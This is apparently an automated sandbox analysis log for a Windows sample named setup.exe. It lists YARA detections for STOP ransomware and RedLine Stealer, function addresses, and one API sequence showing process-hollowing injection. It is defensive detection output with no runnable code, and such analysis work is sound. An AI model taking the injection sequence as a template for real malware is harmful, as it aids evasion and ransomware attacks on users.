        Source: 5.2.setup.exe.20715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 5.2.setup.exe.20715a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 12.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 12.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 0.2.setup.exe.20115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0.2.setup.exe.20115a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 16.2.setup.exe.20b15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 16.2.setup.exe.20b15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 2.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 2.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 17.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 17.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 7.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 7.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 16.2.setup.exe.20b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 16.2.setup.exe.20b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 00000000.00000002.2088895615.0000000001F3C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000005.00000002.2127962943.000000000064A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 0000000B.00000002.2245296367.0000000000816000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 00000010.00000002.2324127923.0000000002016000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000010.00000002.2324184436.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: Process Memory Space: setup.exe PID: 3604, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: setup.exe PID: 6316, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: setup.exe PID: 6864, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: setup.exe PID: 7036, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: setup.exe PID: 5252, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: setup.exe PID: 4232, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: setup.exe PID: 6416, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: setup.exe PID: 3816, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_02010110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_02010110
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_02070110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,5_2_02070110
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004129C90_2_004129C9
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004135CE0_2_004135CE
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004131FC0_2_004131FC
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004139B60_2_004139B6
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0040D6560_2_0040D656
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00412E5E0_2_00412E5E
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020172200_2_02017220
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020922C00_2_020922C0
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0205E37C0_2_0205E37C
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020173930_2_02017393
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0201B0000_2_0201B000
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0201A0260_2_0201A026
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0202F0300_2_0202F030
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0201B0B00_2_0201B0B0
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020200D00_2_020200D0
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020170E00_2_020170E0
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020130F00_2_020130F0
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020191200_2_02019120
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0205E1410_2_0205E141
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0203D1A40_2_0203D1A4
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0201A6990_2_0201A699
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0205B69F0_2_0205B69F
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0201E6E00_2_0201E6E0
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0201C7600_2_0201C760
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0201A79A0_2_0201A79A
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0203D7F10_2_0203D7F1
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020135200_2_02013520
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020175200_2_02017520
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0201CA100_2_0201CA10
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_02017A800_2_02017A80
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_02020B000_2_02020B00
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_02012B600_2_02012B60
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0201DBE00_2_0201DBE0
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020178800_2_02017880
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020318D00_2_020318D0
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0201A9160_2_0201A916
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0202A9300_2_0202A930
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0203E9A30_2_0203E9A3
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0203F9B00_2_0203F9B0
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020189D00_2_020189D0
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020159F70_2_020159F7
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_02018E600_2_02018E60
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_02044E9F0_2_02044E9F
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_02052D1E0_2_02052D1E
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_02015DE70_2_02015DE7
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_02015DF70_2_02015DF7
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040D2402_2_0040D240
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00419F902_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040C0702_2_0040C070
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0042E0032_2_0042E003
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004080302_2_00408030
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004101602_2_00410160
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004C81132_2_004C8113
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004021C02_2_004021C0
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0044237E2_2_0044237E
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004084C02_2_004084C0
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004344FF2_2_004344FF
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0043E5A32_2_0043E5A3
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040A6602_2_0040A660
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0041E6902_2_0041E690
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004067402_2_00406740
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004027502_2_00402750
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040A7102_2_0040A710
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004087802_2_00408780
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0042C8042_2_0042C804
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004068802_2_00406880
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004349F32_2_004349F3
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004069F32_2_004069F3
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00402B802_2_00402B80
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00406B802_2_00406B80
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0044ACFF2_2_0044ACFF
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0042CE512_2_0042CE51
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00434E0B2_2_00434E0B
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00406EE02_2_00406EE0
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00420F302_2_00420F30
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004050572_2_00405057
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0042F0102_2_0042F010
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004070E02_2_004070E0
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004391F62_2_004391F6
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004352402_2_00435240
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004C93432_2_004C9343
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004054472_2_00405447
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004054572_2_00405457
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004495062_2_00449506
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0044B5B12_2_0044B5B1
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004356752_2_00435675
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004096862_2_00409686
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040F7302_2_0040F730
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0044D7A12_2_0044D7A1
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004819202_2_00481920
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0044D9DC2_2_0044D9DC
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00449A712_2_00449A71
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00443B402_2_00443B40
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00409CF92_2_00409CF9
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040DD402_2_0040DD40
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00427D6C2_2_00427D6C
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040BDC02_2_0040BDC0
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00409DFA2_2_00409DFA
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00409F762_2_00409F76
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0046BFE02_2_0046BFE0
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00449FE32_2_00449FE3
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020772205_2_02077220
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020F22C05_2_020F22C0
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020BE37C5_2_020BE37C
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020773935_2_02077393
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0207B0005_2_0207B000
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0207A0265_2_0207A026
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0208F0305_2_0208F030
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0207B0B05_2_0207B0B0
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020800D05_2_020800D0
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020770E05_2_020770E0
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020730F05_2_020730F0
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020791205_2_02079120
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020BE1415_2_020BE141
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0209D1A45_2_0209D1A4
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020BB69F5_2_020BB69F
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0207A6995_2_0207A699
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0207E6E05_2_0207E6E0
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0207C7605_2_0207C760
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0207A79A5_2_0207A79A
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0209D7F15_2_0209D7F1
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020735205_2_02073520
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020775205_2_02077520
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0207CA105_2_0207CA10
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_02077A805_2_02077A80
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_02080B005_2_02080B00
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_02072B605_2_02072B60
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0207DBE05_2_0207DBE0
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020778805_2_02077880
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020918D05_2_020918D0
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0207A9165_2_0207A916
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0208A9305_2_0208A930
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0209E9A35_2_0209E9A3
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0209F9B05_2_0209F9B0
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020789D05_2_020789D0
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020759F75_2_020759F7
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_02078E605_2_02078E60
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020A4E9F5_2_020A4E9F
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_020B2D1E5_2_020B2D1E
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_02075DE75_2_02075DE7
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_02075DF75_2_02075DF7
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: 6_2_004129C96_2_004129C9
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: 6_2_004135CE6_2_004135CE
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: 6_2_004131FC6_2_004131FC
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: 6_2_004139B66_2_004139B6
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: 6_2_0040D6566_2_0040D656
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: 6_2_00412E5E6_2_00412E5E
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0042E0037_2_0042E003
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040D2407_2_0040D240
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0041E6907_2_0041E690
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040F7307_2_0040F730
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004819207_2_00481920
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00419F907_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050D0507_2_0050D050
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004050577_2_00405057
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040C0707_2_0040C070
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0042F0107_2_0042F010
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050D0087_2_0050D008
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004080307_2_00408030
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050D0287_2_0050D028
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004070E07_2_004070E0
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050D0907_2_0050D090
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050D0A87_2_0050D0A8
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004101607_2_00410160
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004C81137_2_004C8113
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004021C07_2_004021C0
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004C93437_2_004C9343
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0044237E7_2_0044237E
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004054477_2_00405447
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004054577_2_00405457
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004084C07_2_004084C0
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050C4E07_2_0050C4E0
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004344FF7_2_004344FF
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004495067_2_00449506
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0043E5A37_2_0043E5A3
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0044B5B17_2_0044B5B1
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040A6607_2_0040A660
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004096867_2_00409686
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004067407_2_00406740
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004027507_2_00402750
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040A7107_2_0040A710
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004087807_2_00408780
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0044D7A17_2_0044D7A1
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0042C8047_2_0042C804
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004068807_2_00406880
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050C9607_2_0050C960
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050C9287_2_0050C928
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0044D9DC7_2_0044D9DC
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004069F37_2_004069F3
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050C9887_2_0050C988
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050C9A87_2_0050C9A8
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00449A717_2_00449A71
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00443B407_2_00443B40
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050CB787_2_0050CB78
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00402B807_2_00402B80
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00406B807_2_00406B80
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00409CF97_2_00409CF9
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0044ACFF7_2_0044ACFF
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040DD407_2_0040DD40
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00427D6C7_2_00427D6C
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050CD607_2_0050CD60
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040BDC07_2_0040BDC0
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050CDF07_2_0050CDF0
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00409DFA7_2_00409DFA
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050CE587_2_0050CE58
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0042CE517_2_0042CE51
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00406EE07_2_00406EE0
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00409F767_2_00409F76
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00420F307_2_00420F30
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050CF287_2_0050CF28
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050CFC07_2_0050CFC0
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00449FE37_2_00449FE3
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050CF907_2_0050CF90
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00428C81 appears 79 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 004547A0 appears 108 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 02040160 appears 50 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 02038EC0 appears 57 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 0044F23E appears 108 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00454E50 appears 78 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00441A25 appears 44 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 0044F26C appears 41 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 020A0160 appears 50 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00420EC2 appears 40 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 02098EC0 appears 57 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00422587 appears 48 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 0042F7C0 appears 174 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00428520 appears 144 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00425007 appears 32 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00450870 appears 52 times
        Source: setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 7.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 7.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 11.2.setup.exe.20d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 11.2.setup.exe.20d15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 17.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 17.2.setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
